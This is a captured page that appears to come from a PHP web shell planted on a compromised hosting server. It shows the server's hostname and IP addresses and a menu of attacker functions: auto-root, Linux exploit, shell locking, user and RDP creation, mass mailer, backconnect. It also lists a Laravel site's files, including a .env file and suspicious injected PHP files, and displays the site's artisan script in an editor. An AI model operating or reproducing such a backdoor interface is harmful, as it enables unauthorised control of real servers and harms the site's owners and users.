Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.139
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechschedule.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
4705b
[ DIR ]
dr-xr-xr-x
Modules
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dc15d0
[ DIR ]
drwxr-xr-x
dzkgouv
[ DIR ]
drwxr-xr-x
hms
[ DIR ]
drwxr-xr-x
hpg1ifs
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lkye1sq
[ DIR ]
drwxr-xr-x
medrfyx
[ DIR ]
drwxr-xr-x
mwpakrs
[ DIR ]
drwxr-xr-x
ojclbsv
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
wcesxlm
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
xtrsn1u
[ DIR ]
drwxr-xr-x
.editorconfig
220
B
-rw-r--r--
.env
1.82
KB
-rw-r--r--
.env.example
1.79
KB
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
255
B
-rw-r--r--
.htaccess
1.13
KB
-r-xr-xr-x
.shift
131
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
README.md
439
B
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
3.66
KB
-rw-r--r--
composer.lock
548.21
KB
-rw-r--r--
defaults.php
1.93
KB
-r--r--r--
error_log
6.09
KB
-rw-r--r--
google0f195a36a1ebd30e.html
53
B
-rw-r--r--
index.php
32.24
KB
-r-xr-xr-x
license-bvkm.php
629
B
-rw-r--r--
modules_statuses.json
14
B
-rw-r--r--
networks.php
1.87
KB
-r--r--r--
options.php
1.93
KB
-r--r--r--
package-lock.json
593.43
KB
-rw-r--r--
package.json
1.33
KB
-rw-r--r--
phpunit.xml
1.35
KB
-rw-r--r--
plugins.php
1.93
KB
-r--r--r--
robots.txt
424
B
-r--r--r--
webpack.mix.js
50
KB
-rw-r--r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
wp-log1n.php
1.72
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close